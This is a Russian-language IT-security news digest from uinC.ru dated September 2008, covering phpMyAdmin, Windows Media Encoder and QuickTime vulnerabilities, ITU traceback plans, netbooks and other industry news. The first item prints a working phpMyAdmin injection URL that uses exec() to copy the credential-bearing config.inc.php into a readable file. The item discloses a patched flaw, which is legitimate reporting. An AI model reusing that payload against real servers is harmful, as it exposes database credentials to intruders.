В популярном web-интерфейсе для управления СУБД MySQL - phpMyAdmin, используемом на многих хостингах, обнаружена критическая уязвимость, позволяющая удаленному злоумышленнику выполнить PHP-код на сервере, включая вызов внешних команд через PHP-функцию exec(), сообщает opennet.ru. Проблема устранена в phpMyAdmin версиях 2.11.9.1 и 3.0.0-rc2. Пример, запроса выполняющего команду "cp": http://www.example.com/server_databases.php?pos=0&dbstats=0&sort_by="]) OR exec('cp $(pwd)"/config.inc.php" config.txt'); //&sort_order=desc&token=[valid token]
Описание уязвимости

18/09/2008 12:18 ПО с открытыми кодами для мобильников уязвимо
На выставке CTIA Wireless I.T. & Entertainment состоялась дискуссия о проблемах безопасности программного обеспечения с открытыми кодами, предназначенного для мобильных телефонов. Участники единодушно признали, что открытые платформы предоставляют великолепные возможности для программистов, но рискуют стать головной болью для специалистов по IT-безопасности. Так, эксперты в своем обсуждении упомянули Symbian. Как известно, седьмая и восьмая версии этой мобильной платформы были абсолютно открытыми и позволяли инсталляцию и запуск любых приложений. В результате, за два года появилось множество вирусов, атакующих мобильные телефоны, работающие на данной ОС. И девятую версию разработчикам пришлось делать с закрытым кодом.
Подробности

18/09/2008 12:57 Хакеры уже пользуются дырой в Windows Media Encode
Злоумышленники не теряли времени даром в поисках способов использования уязвимости в Microsoft Windows Media Encoder. Всего через четыре дня после того, как в Редмонде выпустили патчи, устраняющие эту и семь других уязвимостей, эксперты по сетевой безопасности уже обнаружили вредоносный код, направленный на тех, кто еще не установил эти обновления. Необходимый для проведения атаки код был опубликован на Milw0rm уже в пятницу, всего лишь три дня спустя после ежемесячного обновления Microsoft, и в этот же день специалисты из Symantec начали выявлять различные варианты его применения. "Хронология атаки – это еще одно свидетельство того, насколько быстро опубликованные примеры эксплоитов находят свое применение в реальных утилитах взлома", - пишет Шон Хиттель, эксперт Symantec. Хакеры распространяют использующий эту уязвимость инструментарий в двух видах. Первый – это простая программа с открытым исходным кодом, представляющая собой модифицированный образец эталонного шеллкода. Еще один метод распространения – это включение данного эксплоита в состав широко известной утилиты под названием e2. e2 внедряет в обычную веб-страницу зашифрованный модуль, перенаправляющий посетителей на другой сайт, при помощи которого и производится атака. Схема шифрования, примененная в e2, аналогична той, что применяется в последних версиях MPack, использующих метод ассиметричной криптографии.
Источник

18/09/2008 13:30 МСЭ положит конец анонимности в Internet
На повестке дня ведущего международного органа, занимающегося выработкой телекоммуникационных стандартов, стоит поиск решений, которые осложнили бы злоумышленникам фальсификацию своих электронных адресов, что должно привести к снижению числа атак DoS и SMS-спама. Правда, правозащитники опасаются, что это повлечет за собой полную ликвидацию анонимности в Internet. "Появление у властей возможности отследить происхождение любого трафика Internet неизбежно приведет к усилению репрессий со стороны государства, -- отметил вице-президент Центра развития демократии и технологий по вопросам публичной политики Джим Демпси. -- Поэтому я весьма скептически отношусь к тем преимуществам с точки зрения безопасности, которые сулит подобное решение". На очередном заседании Международного союза электросвязи (Iternational Telecommunication Union, ITU), которое пройдет в Женеве, эксперты в области телекоммуникаций обсудят предварительный вариант спецификаций X.tb-ucr, которые должны помочь в отслеживании обратного адреса и выявлении источника пакетов, пересылаемых по IP-сетям. "Для защиты инфраструктуры и предотвращения атак, осуществляемых через сеть, очень важно знать источник трафика", -- пояснил один из членов рабочей группы МСЭ по телекоммуникационной безопасности Тони Рутковски, вице-президент компании Verisign по стандартам и взаимодействию с регулирующими органами. Как известно, в пакетах, которые циркулируют в IP-сетях, присутствует информация об адресах источника и получателя. В процессе перемещения пакетов от одного маршрутизатора к другому адрес источника не проверяется. И если исходный адрес отправителя в пакете подменить или фальсифицировать, выявить происхождение трафика становится крайне затруднительно. Впрочем, ничего страшного в этом нет - до тех пор, пока трафик не начнет доставлять людям неприятности, как это происходит, например, при организации атак серверов, направленных на отказ в обслуживании (Ddenial of Sservice, DoS). "Примерно 10% запросов, приходящих на DNS-серверы Verisign инициированы людьми, которые пытаются провести DoS-атаку, -- отметил Рутковски. -- В таких случаях мы используем собственные средства обратной трассировки". Финансовым службам телекоммуникационных компаний тоже интересно, откуда приходит трафик Internet. Операторы видят, что большая часть трафика SMS-сообщений, а также систем VoIP проходит через шлюзы Internet. Причем они имеют полное право взимать за это плату с отправителей. Но если источник трафика скрыт или фальсифицирован, непонятно, кому выставлять счет. "Подобный 'фантомный' трафик обходится операторам в сотни миллионов долларов в год", -- сообщил Рутковски. Вопросы отслеживания IP-адресов в рабочей группе ITU Study Group 17 рассматриваются, начиная с апреля 2007 года. Именно тогда ее вице-президент, представитель китайского производителя оборудования ZTE Жиньонь Чень провел первую презентацию, посвященную этой теме, а в апреле нынешнего года ее изучением решено было заняться более серьезно. В ходе предстоящего заседания члены МСЭ намерены внести свои замечания в предварительные рекомендации исследователей телекоммуникационных технологий из Китая и Южной Кореи. Наиболее весомый вклад в эти рекомендации внес орган стандартизации Южной Кореи Telecommunications Technology Association.
Источник

19/09/2008 09:28 Toshiba представила свой первый нетбук
Японская корпорация Toshiba представила свой первый нетбук NB100, пишет Stuff.tv. Диагональ экрана NB100 будет равна 8,9 дюймам, а разрешение составит 1024 на 600 пикселей. Нетбук будет оснащен процессором Intel Atom, гигабайтом оперативной памяти, а также жестким диском емкостью до 120 гигабайт. В него также встроена 0,3-мегапиксельная веб-камера. Toshiba NB100 будет поставляться в варианте с Windows XP или одной из ОС на ядре Linux. По утверждениям компании, батареи в среднем хватит на 3 часа 47 минут. Для сравнения, ближайший конкурент NB100, Asus Eee PC 901 способен работать 7-8 часов без подзарядки. В Великобритании ноутбук будет стоить около 260 фунтов стерлингов (около 470 долларов). Он должен поступить в продажу в октябре 2008 года.
Подробности

19/09/2008 09:53 Сайты чаще всего страдают от XSS-атак, утечек данных и SQL-вторжений
Наиболее распространенными уязвимостями веб-приложений являются межсайтовый скриптинг (Cross-Site Scripting), утечка информации (Information Leakage), «SQL-вторжение» (SQL Injection) и предсказуемое расположение ресурсов (Predictable Resource Location), согласно статистике, опубликованной группой экспертов Консорциума по безопасности веб-приложений (Web Application Security Consortium). В статистику вошли два набора данных: результаты автоматического тестирования и результаты работ по оценке защищенности с использованием методов BlackBox и WhiteBox («черного и белого ящика»). Статистика содержит данные о более чем 32 000 веб-приложений, в которых было обнаружено около 70 000 уязвимостей различной степени риска. Анализ полученных данных показал, что более 7% всех проанализированных сайтов могут быть скомпрометированы полностью автоматически, а при детальной ручной и автоматизированной оценке методами BlackBox и WhiteBox вероятность обнаружения уязвимости высокой степени риска достигает 96,8%. По словам лидера проекта, руководителя отдела консалтинга и аудита компании Positive Technologies Сергея Гордейчика, ситуация с защищенностью веб-приложений остается достаточно сложной. «Статистика показывает, что детальный анализ позволяет идентифицировать до 9 уязвимостей высокой степени риска на каждом из сайтов», - подчеркнул он. Отметим, что статистика уязвимостей безопасности интернет-сайтов, обнаруженных в 2007 г., составлена на основе данных, которые были получены в результате работ по оценке защищенности веб-приложений, проводимых компаниями Booz Allen Hamilton, BT, Cenzic, dblogic.it, HP Application Security Center, Positive Technologies, Veracode и WhiteHat Security в 2007 г.
Источник

19/09/2008 10:05 Asus поставляла хакерские программы и конфиденциальные документы в комплекте с лэптопами
Корпорация Asus по ошибке включила в комплект поставки своих продуктов любопытный DVD-диск, содержащий хакерские программы и несколько конфиденциальных документов. Диск был обнаружен одним из читателей журнала PC Pro, незадолго до этого ставшего обладателем ноутбука от ASUS. Пользователь утверждает, что установленный на его ПК антивирус среагировал на «взломщик ключей» для популярного архиватора WinRAR, оказавшийся в одной из папок. Внимательно изучив содержимое диска, владелец ноутбука обнаружил на нем следующие каталоги:
- Папку с красноречивым названием «Crack», предположительно содержащую серийные номера к различным программным продуктам;
- Папку с большим количеством конфиденциальных документов от Microsoft, предназначенных для производителей ПК и содержащих соответствующие ключи и файлы приложений program files;
- Ряд документов для распространения внутри корпорации и исходные тексты ПО от Asus. Один из этих документов представляет собой презентацию PowerPoint, которая знакомит зрителя с целым рядом «насущных проблем», вызывающих беспокойство у руководства компании (включая проблемы с совместимостью приложений).
Читатель прислал диск в редакцию PC Pro и корреспонденты смогли лично убедиться в существовании указанных файлов. После этого обозреватели провели небольшое Интернет-расследование и установили, что диск с конфиденциальными материалам существует отнюдь не в единственном экземпляре. Автор одного из постов на форуме Asus также делится информацией о подобной находке. Еще одно упоминание о компрометирующем диске удалось обнаружить на форуме австралийского компьютерного журнала Australian APC. Представитель Asus принес свои извинения клиентам и уверил их в том, что подобная ситуация впредь не повторится, однако отказался от каких-либо подробных комментариев случившегося.
Источник

19/09/2008 10:29 Symantec и Sophos предупреждают об угрозах, связанных с некоторыми продуктами Apple
Специалисты по информбезопасности предупреждают об обнаружении серьезных уязвимостей в приложениях QuickTime и iTunes, сообщает CNET News. Запись в Национальной базе данных уязвимостей США (National Vulnerability Database) указывает на возможность осуществления атаки по методу heap overflow (один из типов атак, основанных на переполнении буфера памяти) в приложениях QuickTime 7.5.5 и iTunes 8.0. Специалисты Symantec, по словам эксперта компании Аарона Адамса, в данный момент исследуют обнаруженные уязвимости. Пока эксперты не могут предложить пользователям надежного способа избежать угрозы, однако они рекомендуют проявить осторожность при обозревании интернета и деинсталлировать плагин QuickTime. Представители Apple пока никак не прокомментировали ситуацию. Напомним, что не далее как неделю назад компания выпустила обновления, устраняющие 9 других уязвимостей в QuickTime, и уладила проблемы, возникавшие у пользователей Windows Vista при обращении к сервису iTunes. С начала года Apple уже 5 раз обновляла свой медиа-плейер, устранив в общей сложности более 30 неполадок. Киберпреступники также не обделили вниманием компанию Apple на этой неделе. Эксперты фирмы Sophos предупреждают о спам-кампании, инициаторы которой распространяют троянскую программу под видом популярной игры для iPhone. К электронным письмам с темами "Virtual iPhone games!", "Apple: The most popular game!" и им подобными, прикреплен архив "Penguin.Panic.zip," якобы содержащий популярную одноименную игру. Истинное содержимое архива было идентифицировано специалистами Sophos как троянская программа Troj/Agent-HNY, атакующая машины под управлением операционных систем Windows. Версии трояна, представляющие угрозу для Mac OS X пока не были обнаружены экспертами Sophos.
Подробности

19/09/2008 13:54 Компания SGI сделала лицензию на OpenGL более свободной
Компания SGI объявила о выпуске своих наработок, связанных с OpenGL, под новой, более свободной, лицензией, приурочив данный шаг к 25-летию движения GNU, сообщает opennet.ru. Новая редакция лицензии "SGI Free Software License B" теперь полностью идентична лицензии X11 (MIT License), используемой сообществом X.Org. В число исходных текстов, распространяемых под новой лицензией, попала реализация GLX API, код SGI OpenGL Sample Implementation и различные GLX расширения. Данные наработки были изначально опубликованы SGI в 1999-м году, а ныне входят в состав Mesa и X.org. Фонд свободного программного обеспечения (Free Software Foundation) принял непосредственное участие в устранении всех проблемных пунктов старой лицензии, которая ранее не могла считаться полностью свободной. По словам представителей FSF, данный поступок SGI представляет собой одно из наиболее крупных вложений проприетарных компаний в дело свободного ПО за всю историю этого движения. Новая лицензия также получила одобрение со стороны консорциума Khronos Group, занимающегося развитием спецификации OpenGL. Теперь, дистрибутивы, правилом которых является распространение только истинно свободного ПО (такие, как gNewSense) могут включить в свой состав и поддержку OpenGL.
Подробности

19/09/2008 14:38 Школы отключают от федерального Интернета
С 1 октября этого года начнется отключение региональных школ от "федерального" Интернета, сообщает "Русский журнал". В Минобразования и науки уже составлен график отключения: 1 октября по стране "отключат" от Интернета 597 школ, а в ноябре – 8712. Cогласно нацпроекту "Образование", федеральная власть должна была оплачивать интернет-трафик школ в течение двух лет с момента подключения. В июле этого года министр образования и науки Андрей Фурсенко напомнил об этом руководителям регионов, отметив, что "центр тяжести будет переходить в руки региональных властей". Позднее президент РФ Дмитрий Медведев заявил, что раздал соответствующие поручения и уверен в том, что деньги на "школьный Интернет" в администрациях регионов придется найти. Указаниям, однако, последовали не все адресаты: с 1 октября без Интернета могут остаться школы Саратовской, Самарской, Белгородской, Ивановской, Костромской, Липецкой, Курской, Орловской, Читинской, Омской, Брянской и других областей. В пресс-службе губернатора Брянской области, как сообщает Брянск.Ru, рассказывают, что средства из бюджета уже выделены, но дело не продвигается из-за "отсутствия четких директив из федерального агентства образования". А в Псковской области всерьез задумываются над тем, чтобы переложить ответственность за оплату Интернета на сами школы. "В каждой школе есть графа расходов – "на образовательные программы". Оттуда они могут оплачивать услуги по использованию Интернета", – цитирует Псковское агентство информации слова представителя Государственного управления образования области Олега Магера. В то же время главы некоторых других регионов с ответственностью отнеслись к свалившейся на их головы необходимости платить за школьный Интернет. Иркутское отделение "Российской газеты" пишет, что средства на оплату доступа к Сети в школы уже поступили. О своей готовности финансировать учебные заведения из собственного "кошелька" также сообщили главы Мурманской, Кировской, Сахалинской, Воронежской и Ярославской областей, республики Калмыкия и Камчатского края. Важно отметить, что обещания не всегда влекут за собой реальные действия. Окончательное подключение всех российских школ к Интернету должно было быть реализовано к 1 сентября 2007 года, однако к обозначенным срокам планы не были выполнены. В случае если региональные власти так и не озаботятся возложенными на них обязанностями, к концу следующего года без доступа к Сети могут остаться более 15 тысяч школ.
Подробности

20/09/2008 10:29 Сроки выхода бета-версии Firefox 3.1 сдвигаются
На четыре недели увеличивается запланированный интервал между выходом первой и второй бета-версий Firefox 3.1. Это позволит разработчикам браузера включить в версию 3.1 некоторые дополнительные изменения. Среди планируемых нововведений можно отметить наработки в рамках проекта TraceMonkey, мелкие изменения в интерфейсе, основанные на пользовательских откликах по поводу Firefox 3, оптимизацию системы работы с расширениями. Вместе с тем, выход окончательной версии Firefox 3.1 по-прежнему запланирован на конец текущего либо начало следующего года.
Источник

21/09/2008 09:53 Cisco покупает Jabber
Компания Cisco объявила о заключении соглашения о приобретении фирмы Jabber, Inc, курирующей разработку протокола для обмена мгновенными сообщениями XMPP и владеющей торговой маркой Jabber. По замыслу Cisco эта сделка поможет расширить функциональность существующих решений для рабочих групп и удаленной работы. Директор WebEx-группы Cisco Alex Hadden-Boyd подтвердил серьезность намерений компании стать №1 в предоставлении сервисов для совместной работы: «мы видим огромные перспективы за этими технологиями». Jabber с его операционной совместимостью являлся недостающим звеном в портфеле предлагаемых решений, среди которых TelePresence для видеоконференций, Webex — онлайн среда совместного доступа к различным документам, PostPath — для функций календаря и электронной почты, Securant - для защиты корпоративных сетей, и IronPort — для безопасной передачи сообщений. Добавив к этому огромный спектр уже имеющихся устройств и ПО для телефонии, амбиции Cisco могут легко воплотиться в жизнь. Приобретение Jabber возможно нанесет серьезный удар компании Avaya, начав соревнование между двумя крупными производителями. Предлагаемый последней коммуникационный сервер так же построен на основе технологии Jabber. Сделка должна быть завершена в первой половине 2009 года на условиях, детали которых пока не разглашаются. Известно, что сотрудники Jabber перейдут в подразделение Cisco Collaboration Software Group (CSG).
Подробности

21/09/2008 10:24 Intel выпустила двухъядерный процессор Atom
Корпорация Intel выпустила двухъядерную версию энергосберегающего процессора Atom, Atom 330, сообщает CrunchGear. Как и все новые процессоры Intel, он выполнен по 45-нанометровой технологии. Чип Atom 330 будет работать на частоте 1,6 гигагерца, имеет мегабайтный кэш второго уровня и поддерживает память DDR2 на частоте 667 мегагерц. Его энергопотребление составляет 8 ватт. Двухъядерный Atom с низким потреблением будет применяться в основном в неттопах - настольных компьютерах, основной функцией которых является веб-серфинг. Одноядерный Atom благодаря своему низкому энергопотреблению с успехом применяется в нетбуках - ноутбуках для использования интернет-сервисов. Intel продает новый процессор в составе интегрированного решения, вместе с чипсетом Intel 945GC Express, в который входят видеосистема Intel GMA 950 и встроенная аудиокарта, поддерживающая спецификацию Intel High Definition Audio.
Подробнее

21/09/2008 10:33 Хакеры препятствуют изучению вредоносного кода
Киберпреступники постоянно видоизменяют контент, загружаемый с управляемых ими сайтов, с тем, чтобы затруднить его эффективный анализ. По данным Websense Security Labs, отслеживание вредоносного ПО становится все более затруднительным, поскольку на хакерских сайтах предоставляемый контент постоянно меняется в зависимости от IP-адреса и идентификатора приложения. Так, при проведении исследования подозрительных Flash-файлов в компании столкнулись с ситуацией, когда при переходе по присланной в электронном сообщении ссылке на .swf-файл пользователь автоматически перенаправлялся на подозрительный сайт. Однако, когда эксперты попробовали скачать тот же файл при помощи Wget, они столкнулись с сообщением об "Ошибке 403" (Отказ в доступе). Сначала исследователи решили, что они либо попали в черный список хакеров, либо те проверяли все атрибуты в заголовке HTTP. Однако после настройки cookie выяснилось, что соединение все-таки происходит. Таким образом удалось понять, что хакеры в данном случае установили запрет на доступ приложения, имитирующего работу браузера (Wget). В своем блоге эксперт из Websense Стефан Шенетт дал дальнейшие разъяснения: "Чтобы проверить наши выводы, я написал небольшой скрипт на PERL. Вначале я вписал в него все заголовки, которые сервер ожидает увидеть в случае, когда пользователь кликает по ссылке на .swf-файл. Я получил от сервера, содержащего спам, ответ ‘200 OK'. После этого, я захотел убедиться, что сервер просматривает HTTP REFERER, но с удивлением обнаружил, что ответ сервера от него не зависит. После непродолжительной игры с настройками я выяснил, что сервер анализирует данные идентификатора приложения. Если они соответствуют Wget, то он выдает ошибку".
Источник

21/09/2008 11:21 Грузинское информационное агентство GHN подверглось кибер-атаке
В последние несколько дней информационное агентство GHN подвергалось постоянной кибер-атаке и агентство прекратило работу в связи с этим. С началом грузино-российского противостояния на грузинские ресурсы постоянно велись кибер-атаки типа DDoS, когда специальные вирусы с нескольких десятков, а то и сотен тысяч компьютеров со всего мира посылают запросы на определенный адрес, в результате чего забивается весь трафик и сайт становится недоступен. Таким атакам за все время противостояния подвергались и продолжают подвергаться все информационные ресурсы Грузии. В первые дни были осуществлены хакерские атаки и на сайты государственных учреждений страны, такие как МИД, МВД. Атаке подвергся и президентский сайт. На данный момент веб-страницы госучреждений работают исправно, однако атаки на информационные ресурсы не прекращаются. На данный момент блокированы информационные порталы GHN, Грузия Online, News.ge, SOSGeorgia и другие.
Источник

21/09/2008 12:22 QuickTime и iTunes вновь подвержены критической опасности
Самое популярное программное обеспечение компании Apple вновь подвержено критической опасности, при том что компания менее недели назад уже выпустила порцию из 9 патчей для этого софта. Как сообщили в компании Symantec, обнаружившей опасность, о проблемах уже известно злоумышленникам и они используют уязвимость. Впервые эксплоит был замечен на сайте milw0rm.com. В его основе лежит уязвимость в параметре <? quicktime type= ?>, указываемом для внедрения видео-клипа в веб-страницу. Нынешние версии мультимедиа-проигрывателей Apple не могут обрабатывать очень длинные строки параметров. "Symantec сейчас исследует более подробно эту уязвимость и пытается выяснить технические детали", - говорит представитель компании Аарон Адамс. В обнаруженной версии эксплоита просто аварийно завершается работа QuickTime, однако при минимальной модификации метода можно вызвать атаку типа отказ в обслуживании. "Этот эксплоит в принципе допускает вероятность выполнения злонамеренного кода, а раз так, то уязвимость представляется нам очень опасной, так как хакеры могут разместить злонамеренный код на той же странице и защититься от него будет нелегко", - отмечает он. Сейчас ни Apple, ни Symantec никаких дополнительных комментариев по данному поводу не дают.
Источник


Архив рассылки новостей:
http://uinc.ru/news/archive/


На этом пока все.
Всем удачи.
uinC Team
http://uinc.ru

P.S. Все предложения, замечания и просьбы оставлять здесь:
http://uinc.ru/news/sendnews.php

Любые материалы с нашего сайта или рассылки не могут быть скопированы без разрешения автора или администрации сервера uinC.ru